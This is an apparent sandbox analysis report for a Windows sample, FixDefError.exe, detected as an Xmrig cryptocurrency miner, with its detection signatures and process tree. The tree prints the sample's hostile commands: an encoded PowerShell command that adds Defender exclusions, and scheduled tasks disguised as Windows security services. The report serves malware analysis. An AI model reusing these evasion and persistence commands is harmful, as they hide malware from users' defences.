Edit tour
Windows
Analysis Report
FixDefError.exe
Overview
General Information
| Sample Name: | FixDefError.exe |
| Analysis ID: | 829697 |
| MD5: | 1b664f2a0bede6c47e44ca8c0aad3de7 |
| SHA1: | 2dc3169220411d03be438047a3c33696b4371d2b |
| SHA256: | 908641c2c756b0a2762e4883f7defb050e1baa09d44be8cdad34c5aa562d65d9 |
| Tags: | exe |
| Infos: |   |
 | |
Detection
Xmrig
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Sigma detected: Schedule system process
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Modifies power options to not sleep / hibernate
Found strings related to Crypto-Mining
Modifies the hosts file
Encrypted powershell cmdline option found
Sample is not signed and drops a device driver
Uses the Telegram API (likely for C&C communication)
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
May check the online IP address of the machine
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Machine Learning detection for dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Uses powercfg.exe to modify the power settings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Creates driver files
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
FixDefError.exe (PID: 5872 cmdline: C:\Users\u ser\Deskto p\FixDefEr ror.exe MD5: 1B664F2A0BEDE6C47E44CA8C0AAD3DE7) - ProgramStarter.exe (PID: 5928 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Progra mStarter.e xe" MD5: 0326F45523014399DEA91452C957B5E0) 
cmd.exe (PID: 6128 cmdline: cmd.exe" / C powershe ll -Encode dCommand " PAAjAHMAVQ BCAHYAVgBJ AEcAcABFAE oAbQAjAD4A IABBAGQAZA AtAE0AcABQ AHIAZQBmAG UAcgBlAG4A YwBlACAAPA AjAGsAYwBJ AFQAWQBjAH AAQgBHAEwA VgAjAD4AIA AtAEUAeABj AGwAdQBzAG kAbwBuAFAA YQB0AGgAIA A8ACMAagB0 AEcAZAB6AF EAYwBUAEUA TQBPAGwAZQ BKAFYAcAB3 AGkAbAAjAD 4AIABAACgA IAA8ACMARg BvAEwAVABH AFkAcwBGAH EAcwByAGkA WQB5ACMAPg AgACQAZQBu AHYAOgBVAH MAZQByAFAA cgBvAGYAaQ BsAGUALAAg ADwAIwBwAE sAUABlAHYA RgBGAGwAUg BOAGkAWgBF AFAAWABLAG gATgBJACMA PgAgACQAZQ BuAHYAOgBQ AHIAbwBnAH IAYQBtAEQA YQB0AGEAKQ AgADwAIwBR AFUAQgBKAH kAdgBlAEsA RgBUACMAPg AgAC0ARgBv AHIAYwBlAC AAPAAjAEkA cQBjAFcAcQ BHAEYAagBS AGMATQBFAG gAWQBzAHUA YgAjAD4A MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 6136 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
powershell.exe (PID: 5228 cmdline: powershell -EncodedC ommand "PA AjAHMAVQBC AHYAVgBJAE cAcABFAEoA bQAjAD4AIA BBAGQAZAAt AE0AcABQAH IAZQBmAGUA cgBlAG4AYw BlACAAPAAj AGsAYwBJAF QAWQBjAHAA QgBHAEwAVg AjAD4AIAAt AEUAeABjAG wAdQBzAGkA bwBuAFAAYQ B0AGgAIAA8 ACMAagB0AE cAZAB6AFEA YwBUAEUATQ BPAGwAZQBK AFYAcAB3AG kAbAAjAD4A IABAACgAIA A8ACMARgBv AEwAVABHAF kAcwBGAHEA cwByAGkAWQ B5ACMAPgAg ACQAZQBuAH YAOgBVAHMA ZQByAFAAcg BvAGYAaQBs AGUALAAgAD wAIwBwAEsA UABlAHYARg BGAGwAUgBO AGkAWgBFAF AAWABLAGgA TgBJACMAPg AgACQAZQBu AHYAOgBQAH IAbwBnAHIA YQBtAEQAYQ B0AGEAKQAg ADwAIwBRAF UAQgBKAHkA dgBlAEsARg BUACMAPgAg AC0ARgBvAH IAYwBlACAA PAAjAEkAcQ BjAFcAcQBH AEYAagBSAG MATQBFAGgA WQBzAHUAYg AjAD4A" MD5: DBA3E6449E97D4E3DF64527EF7012A10) - cmd.exe (PID: 3196 cmdline:
"cmd.exe" /C SCHTASK S /CREATE /SC HOURLY /TN "Secu rityHealth Systray" / TR "C:\Pro gramData\R untimeBrok erData\Run timeBroker .exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 1672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 4900 cmdline:
SCHTASKS / CREATE /SC HOURLY /T N "Securit yHealthSys tray" /TR "C:\Progra mData\Runt imeBrokerD ata\Runtim eBroker.ex e" /RL HIG HEST /f MD5: 15FF7D8324231381BAD48A052F85DF04) - cmd.exe (PID: 4092 cmdline:
"cmd.exe" /C SCHTASK S /CREATE /SC HOURLY /TN "Wind owsDefende r" /TR "C: \ProgramDa ta\Runtime BrokerData \RuntimeBr oker.exe" /RL HIGHES T /f MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 2436 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 2220 cmdline:
SCHTASKS / CREATE /SC HOURLY /T N "Windows Defender" /TR "C:\Pr ogramData\ RuntimeBro kerData\Ru ntimeBroke r.exe" /RL HIGHEST / f MD5: 15FF7D8324231381BAD48A052F85DF04) - cmd.exe (PID: 4844 cmdline:
"cmd.exe" /C SCHTASK S /CREATE /SC HOURLY /TN "WmiP rvSE" /TR "C:\Progra mData\Runt imeBrokerD ata\Runtim eBroker.ex e" /RL HIG HEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 5320 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 5268 cmdline:
SCHTASKS / CREATE /SC HOURLY /T N "WmiPrvS E" /TR "C: \ProgramDa ta\Runtime BrokerData \RuntimeBr oker.exe" /RL HIGHES T /f MD5: 15FF7D8324231381BAD48A052F85DF04) - cmd.exe (PID: 4560 cmdline:
"cmd.exe" /C SCHTASK S /CREATE /SC HOURLY /TN "Anti MalwareSer viceExecut able" /TR "C:\Progra mData\Runt imeBrokerD ata\Runtim eBroker.ex e" /RL HIG HEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 3012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 5296 cmdline:
SCHTASKS / CREATE /SC HOURLY /T N "AntiMal wareServic eExecutabl e" /TR "C: \ProgramDa ta\Runtime BrokerData \RuntimeBr oker.exe" /RL HIGHES T /f MD5: 15FF7D8324231381BAD48A052F85DF04) - cmd.exe (PID: 1964 cmdline:
"cmd.exe" /C SCHTASK S /CREATE /SC HOURLY /TN "Runt imeBroker" /TR "C:\P rogramData \RuntimeBr okerData\R untimeBrok er.exe" /R L HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 5408 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 2956 cmdline:
SCHTASKS / CREATE /SC HOURLY /T N "Runtime Broker" /T R "C:\Prog ramData\Ru ntimeBroke rData\Runt imeBroker. exe" /RL H IGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04) - cmd.exe (PID: 5272 cmdline:
"cmd.exe" /C SCHTASK S /CREATE /SC HOURLY /TN "Micr osoftEdgeU pd" /TR "C :\ProgramD ata\Runtim eBrokerDat a\RuntimeB roker.exe" /RL HIGHE ST /f MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 3228 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)